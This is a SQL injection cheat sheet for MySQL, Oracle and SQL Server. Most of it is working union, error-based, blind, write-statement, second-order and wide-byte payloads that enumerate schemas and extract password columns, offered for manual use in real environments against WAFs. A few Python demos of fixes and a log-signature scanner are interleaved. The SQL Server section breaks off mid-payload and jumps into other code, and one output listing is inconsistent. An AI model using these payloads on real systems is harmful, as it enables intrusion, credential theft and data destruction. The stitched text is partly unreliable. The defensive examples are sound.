Although there are many articles about SQL injection on the Internet, in this era of WAFs manual injection is often particularly important in real environments. This article mainly summarizes knowledge learned earlier. Please correct any deficiencies.
0x01 MySQL manual injection
1.1 Union injection
?id=1' order by 4--+
?id=0' union select 1,2,3,database()--+
?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+
# group_concat(column_name) can be replaced by unhex(hex(cast(column_name+as+char)))
?id=0' union select 1,2,3,group_concat(password) from users --+
# group_concat can be replaced by concat_ws(',',id,users,password)
?id=0' union select 1,2,3,password from users limit 0,1--+
1.2 Error-based injection
1. floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2. extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3. updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10. exp()
select * from test where id=1 and exp(~(select * from(select user())a));
Each error-based statement has its own principle:
Principle of the exp() error: exp() is a mathematical function that returns e raised to the given power. When the argument is greater than 709 the result overflows and MySQL reports an error. The ~ operator (bitwise NOT) turns the subquery result into a very large unsigned value, which is always greater than 709, so an error is guaranteed.
Principle of the updatexml() error: the second parameter of updatexml() must be an XPath string. Content starting with ~ is not valid XPath syntax, and concat() is only a string concatenation function, so the argument obviously violates the rules. MySQL nevertheless evaluates the expression in parentheses and includes its result in the error message, which is what makes error-based injection possible.
Enumerate databases:
?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +
Enumerate tables:
?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +
Enumerate columns:
?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +
Enumerate data:
?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +
# concat can also be placed outside the subquery: updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)
Note that the ~ connector characters take up space in the error message, so only 31 characters of the MD5 hash are returned. The value can be split with the substring function:
substr(string, start, length);  # string is the source string, start the starting position, length the number of characters
?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +
1.3 Blind injection
1.3.1 Time-based blind injection
Time-based blind injection is also called delay injection. It generally uses the sleep() function; BENCHMARK() or a Cartesian product can also be used (try not to use the latter: with a lot of content it becomes very slow).
In general we also need a conditional function:
# if(expr1, expr2, expr3): when expr1 is true, expr2 is returned; when false, expr3 is returned
# blind injection is also combined with the substring functions substr, substring and left provided by MySQL
We generally prefer to encode the output of the substring functions, although not encoding also works. The advantage of encoding is that no quotation marks are needed. Commonly used functions include ascii(), hex(), etc.
?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+
?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+
1.3.2 Boolean-based blind injection
?id=1' and substr((select user()),1,1)='r' -- +
?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +
# IFNULL: if the first argument is NULL, the second argument is returned; otherwise the first argument is returned
?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +
# STRCMP(): returns 0 if both strings are identical, -1 if the first argument is smaller than the second according to the current collation, and 1 otherwise
1.4 INSERT, DELETE, UPDATE
Insert, delete and update injection points mainly use blind and error-based injection. sqlmap and similar tools are not recommended for such points because they generate a large amount of garbage data. This kind of injection generally appears where data is written, such as registration, IP headers and message boards. It is also hard to discover because it does not necessarily produce an error. We can try inserting a single quote, a double quote or the escape character \ so that the statement cannot execute normally; if the insert or update then fails, a deeper test can determine whether injection exists.
1.4.1 Error-based injection
mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin");
Query OK, 1 row affected (0.00 sec)

mysql> select * from admin;
+------+-----------------------------------------------+----------+
| id   | username                                      | password |
+------+-----------------------------------------------+----------+
|    1 | admin                                         | admin    |
|    1 | and 1=1                                       | admin    |
|    2 | or updatexml(1,concat(0x7e,(version())),0) or | admin    |
+------+-----------------------------------------------+----------+
3 rows in set (0.00 sec)

mysql> insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin");
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

# delete injection is very dangerous, very dangerous, very dangerous. Remember not to use or 1=1; the right side of or must be false
mysql> delete from admin where id=-2 or updatexml(1,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'
1.4.2 Blind injection
# For int columns, operators such as addition, subtraction, multiplication, division, or, xor and shifts can be used
mysql> insert into admin values (2+if((substr((select user()),1,1)='r'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (5.00 sec)

mysql> insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (0.00 sec)

# Note that a character column cannot be closed with and
mysql> insert into admin values (2,''+if((substr((select user()),1,1)='p'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (0.00 sec)

mysql> insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (5.01 sec)

# For delete, the right side of or must be false
mysql> delete from admin where id=-2 or if((substr((select user()),1,1)='r4'),sleep(5),0);
Query OK, 0 rows affected (0.00 sec)

mysql> delete from admin where id=-2 or if((substr((select user()),1,1)='r'),sleep(5),0);
Query OK, 0 rows affected (5.00 sec)

# Update: modify data content
mysql> select * from admin;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    2 | 1        | admin    |
|    2 | 1        | admin    |
|    2 | 2        | admin    |
|    2 | admin    | admin    |
+------+----------+----------+
4 rows in set (0.00 sec)

mysql> update admin set id="5"+sleep(5)+"" where id=2;
Query OK, 4 rows affected (20.00 sec)
Rows matched: 4  Changed: 4  Warnings: 0
1.5 Second-order injection and wide-byte injection
Second-order injection statement: where the SQL statement does not wrap the value in single quotes, we can hex-encode the value so that it contains no single quotes or similar characters.
mysql> insert into admin (id,name,pass) values ('3',0x61646d696e272d2d2b,'11');
Query OK, 1 row affected (0.00 sec)

mysql> select * from admin;
+----+-----------+-------+
| id | name      | pass  |
+----+-----------+-------+
|  1 | admin     | admin |
|  2 | admin'111 | 11111 |
|  3 | admin'--+ | 11    |
+----+-----------+-------+
4 rows in set (0.00 sec)
Second-order injection is hard to discover without the source code. It is usually seen in registration: after logging in with a malicious account, the database may treat admin'-- + as the admin account because of the crafted account name.
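The registration-then-lookup flow described above, written as an added example that is not from the original article. An in-memory SQLite table stands in for the MySQL admin table; the unsafe lookup rebuilds the second query by string concatenation (the second-order bug), while the hardened one binds the stored name as a parameter so it can only match itself. Table contents and function names are constructed here.

```python
import sqlite3

# Constructed registration name taken from the article's example: admin'-- +
MALICIOUS_NAME = "admin'-- +"


def setup() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the article's MySQL admin table (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table admin (id integer, name text, pass text)")
    con.execute("insert into admin values (1, 'admin', 'admin')")
    return con


def register(con: sqlite3.Connection, name: str, pwd: str) -> None:
    """Registration with bound parameters: the name is stored verbatim, quotes included."""
    con.execute("insert into admin (id, name, pass) values (?, ?, ?)", (3, name, pwd))


def lookup_unsafe(con: sqlite3.Connection, name: str, pwd: str) -> list:
    """Second use of the stored name by string concatenation: the '-- ' in the
    stored value turns the rest of the WHERE clause into a comment."""
    sql = "select id from admin where name='%s' and pass='%s'" % (name, pwd)
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, name: str, pwd: str) -> list:
    """Same query with placeholders: the stored name is data, never SQL."""
    return con.execute("select id from admin where name=? and pass=?", (name, pwd)).fetchall()


def demo() -> tuple:
    """Register the crafted name, re-read it as the application would, and use it
    in a later query with a wrong password through both lookups."""
    con = setup()
    register(con, MALICIOUS_NAME, "11")
    stored = con.execute("select name from admin where id=3").fetchone()[0]
    return stored, lookup_unsafe(con, stored, "wrong"), lookup_safe(con, stored, "wrong")


if __name__ == "__main__":
    stored, unsafe, safe = demo()
    print("stored name:", stored)
    print("unsafe lookup matched:", unsafe)  # the real admin row, despite the wrong password
    print("safe lookup matched:  ", safe)    # nothing
```

The point for defenders is that escaping at registration time is not enough: every later query that reuses stored values must also bind them as parameters.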
Wide-byte injection: the target applies some protection and converts a single quote into \'. MySQL encodes \ as %5c. In a wide-byte character set two bytes represent one Chinese character, so %df followed by %5c becomes the Chinese character "Yun". Successfully bypassing the escape in this way is so-called wide-byte injection.
id=-1%df' union select...
# without a wide byte:  %27 -> %5c%27
# with a wide byte:     %df%27 -> %df%5c%27 -> one two-byte character followed by a bare '
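An added example, not from the original article, that reproduces at byte level why %df%27 defeats backslash escaping under GBK but not under UTF-8, and shows the fix of decoding in the connection character set before escaping. addslashes, quote_survives and escape_text are names chosen here; the payload bytes are constructed from the article's %df%27.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP's addslashes(): prefix ' " \\ and NUL with a backslash."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # the backslash byte, %5c in the article's notation
        out.append(b)
    return bytes(out)


def has_unescaped_quote(text: str) -> bool:
    """True if the decoded text contains a single quote not preceded by a backslash character."""
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def quote_survives(raw: bytes, charset: str) -> bool:
    """Escape byte-wise, then read the result the way a connection using `charset` would."""
    return has_unescaped_quote(addslashes(raw).decode(charset, errors="replace"))


def escape_text(raw: bytes, charset: str) -> str:
    """Character-aware escaping: decode in the connection charset first, then escape.
    A lone 0xDF cannot pair with the quote, so the quote is escaped as a real character."""
    text = raw.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'")


# Constructed input: the byte 0xDF followed by a quote, i.e. %df%27 from the article.
PAYLOAD = bytes.fromhex("df") + b"'"

if __name__ == "__main__":
    # gbk: 0xDF 0x5C forms one two-byte character that swallows the backslash, so the quote is free.
    print("gbk   ", quote_survives(PAYLOAD, "gbk"))    # True
    # utf-8: 0xDF alone is invalid, the backslash stays a backslash, the quote stays escaped.
    print("utf-8 ", quote_survives(PAYLOAD, "utf-8"))  # False
    # character-aware escaping closes the gap even on a gbk connection.
    print("fixed ", has_unescaped_quote(escape_text(PAYLOAD, "gbk")))  # False
```

The same mismatch is avoided entirely by prepared statements, where the value never passes through the SQL text.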
0x02 Oracle manual injection
2.1 Union injection
?id=-1' union select user,null from dual--
?id=-1' union select version,null from v$instance--
?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--
?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--
?id=-1' union select username,passwd from users--
?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--
2.2 Error-based injection
?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%'))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--
2.3 Blind injection
2.3.1 Boolean-based blind injection
Since this is blind injection, it must involve conditional judgment. Besides the verbose IF ... ELSE ... END IF, Oracle can also use the decode() function.
Syntax: decode(condition, value 1, return value 1, value 2, return value 2, ..., value n, return value n, default value);
The meaning of this function is as follows:
IF condition = value 1 THEN RETURN(return value 1)
ELSIF condition = value 2 THEN RETURN(return value 2)
......
ELSIF condition = value n THEN RETURN(return value n)
ELSE RETURN(default value)
END IF
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--
?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--
?id=1' and ascii(substr(user,1,1))> 64--  # binary search
2.3.2 Time-based blind injection
The DBMS_PIPE.RECEIVE_MESSAGE('any value', delay time) function can be used for time-based blind injection; its second parameter specifies the delay time.
?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
0x03 SQL Server manual injection
3.1 Union injection
?id=-1' union select null,null--
?id=-1' union select @@servername, @@version--
?id=-1' union select db_name(),suser_sname()--
?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--
?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databases)),null--
?id=-1' union select (select top 1 table_name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--
?id=-1' union select (select top 1 column_name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null--
?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--
3.2 Error-based injection
?id=1' and 1=(select 1/@@servername)--
?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--
3.3 Blind injection
3.3.1 Boolean-based blind injection
?id=1' and ascii(substring((select db_name(1)),1,1))> 64--
3.3.2 Time-based blind injection
?id= 1';if(2>1) waitfor delay '0:0:5'--
?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay
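An added detection example, not from the original article, built from the function names this cheat sheet lists for MySQL (updatexml, extractvalue, floor(rand()), exp, sleep, benchmark), Oracle (ctxsys.drithsx.sn, DBMS_PIPE.RECEIVE_MESSAGE) and SQL Server (waitfor delay). It URL-decodes each request's query string and reports which family matched, run over constructed access-log lines; the signature names and log format are choices made here.

```python
import re
from urllib.parse import unquote_plus

# Signature families built from the payload functions listed in this article.
SIGNATURES = {
    "mysql-error": re.compile(r"\b(updatexml|extractvalue|exp)\s*\(|floor\s*\(\s*rand\s*\(", re.I),
    "mysql-time": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "mysql-schema": re.compile(r"information_schema\.(tables|columns|schemata)", re.I),
    "oracle-error": re.compile(r"ctxsys\.drithsx\.sn\s*\(", re.I),
    "oracle-time": re.compile(r"dbms_pipe\.receive_message\s*\(", re.I),
    "mssql-time": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Apache common log format; the request path carries the query string.
LOG_RX = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP')


def normalize(query_string: str) -> str:
    """URL-decode twice (evasion payloads are often double-encoded) and lower-case."""
    return unquote_plus(unquote_plus(query_string)).lower()


def classify(query_string: str) -> list:
    """Return the signature families that match one request's query string."""
    text = normalize(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_log(log_text: str) -> list:
    """Return (client ip, matched families) for every log line that hits a signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RX.match(line)
        if m:
            families = classify(m.group("path"))
            if families:
                hits.append((m.group("ip"), families))
    return hits


# Constructed sample access-log lines (not from the article).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--+ HTTP/1.1" 500 88
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%27%20and%201=(case%20when%20ascii(substr(user,1,1))%3E64%20then%20DBMS_PIPE.RECEIVE_MESSAGE(%27a%27,5)%20else%201%20end)-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%27;if(2%3E1)%20waitfor%20delay%20%270:0:5%27-- HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for ip, families in scan_log(SAMPLE_LOG):
        print(ip, families)
```

Signature matching of this kind is a triage aid, not a substitute for parameterized queries; a 500 response paired with a "mysql-error" hit is the combination worth alerting on first.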